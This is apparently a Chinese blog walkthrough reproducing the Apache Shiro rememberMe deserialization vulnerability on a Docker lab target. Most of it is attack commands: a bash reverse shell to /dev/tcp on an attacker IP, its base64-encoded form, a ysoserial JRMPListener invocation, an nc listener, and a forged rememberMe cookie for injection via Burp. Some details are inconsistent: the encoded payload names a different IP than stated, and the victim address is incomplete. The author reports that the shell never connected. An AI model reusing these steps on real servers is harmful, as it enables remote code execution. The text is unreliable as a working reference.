Apache Shiro反序列化漏洞復現

Apache Shiro反序列化漏洞復現

0x01 搭建環境

獲取docker鏡像
Docker pull medicean/vulapps:s_shiro_1
重啓docker
system restart docker
啓動docker鏡像：
docker run -d -p 8082:8080 medicean/vulapps:s_shiro_1
訪問：
http://192.168.1.192:8082/ 環境搭建成功

攻擊機：139.199.179.167 受害者：192.168.192

搭建好的效果以下：

0x02 製做shell反彈代碼

到這裏進行編碼： http://www.jackson-t.ca/runtime-exec-payloads.html bash -I >& /dev/tcp 139.199.179.167/7892 0>&1 以下所示：

0x03 使用ysoserial中JRMP監聽模塊，監聽6632端口

把你編碼的內容放到這兒：

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6632 CommonsCollections4 '編碼內容'

那麼個人就是

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6632 CommonsCollections4 'bash -c {echo,YmFzaCAtSSA+JiAvZGV2L3RjcCAxMzkuMTY5LjE3OS4xNjcvNzg5MiAwPiYx}|{base64,-d}|{bash,-i}'

而後在攻擊機當中執行剛纔這段代碼 #工具下載地址：https://pan.baidu.com/s/19Lpmx6iKD7joiSvmxDe_ig提取碼：dxk2 如圖下圖：

0x04 監聽反彈端口 7892

nc -lvnp 7892

0x05 生成POC

[root@VM_0_5_centos ~]# python shiro.py 139.199.179.167:6632
rememberMe=qc+eZGvFT9+NKxIbjuBPzEFMIRwCqJZVm7X113QXFstNJ1g2ZEo72Ua76SjXw9NLeUVi2/j1lJQmcNXxu+YXl3x7T36OSVMe72+rxJ5HJ8vkqDXkIwL4evbk7+OF6jvIAKNCd+1Mu0MKfsMOveRyHVXpsc9LtX4u/Rq3V1ojuIXs0e2qBRHXa4quJBtGhrgeHVNhkzWa+SoXtDb+7zkKcdTWIoptzgvzL81pWht1nKB6rGkHGoleWD/98L+8KTDSXgISAfXSMuvAY3W1NZRQJ7Q2juWB46FZa8dz58m7OrUR7f78KZEVBdh5Z7NNWWwa8id174A1H7vJ6PJJJm1dpNJDCrDO9yfBk8WxD9Qgh3rGnhfVRSPhxRvKOBP9NCIqXbAKfbzD67XdqsVrt6zf3g==

把生成後的結果copy一波。而後經過buprsuite修改一波cookie字段。 如圖下圖： 那麼你就會看到你的主機上 此時nc也反彈出來shell了，可是我我的沒反彈出來。payload有些問題吧，理論上wget http 服務，下載shell就行。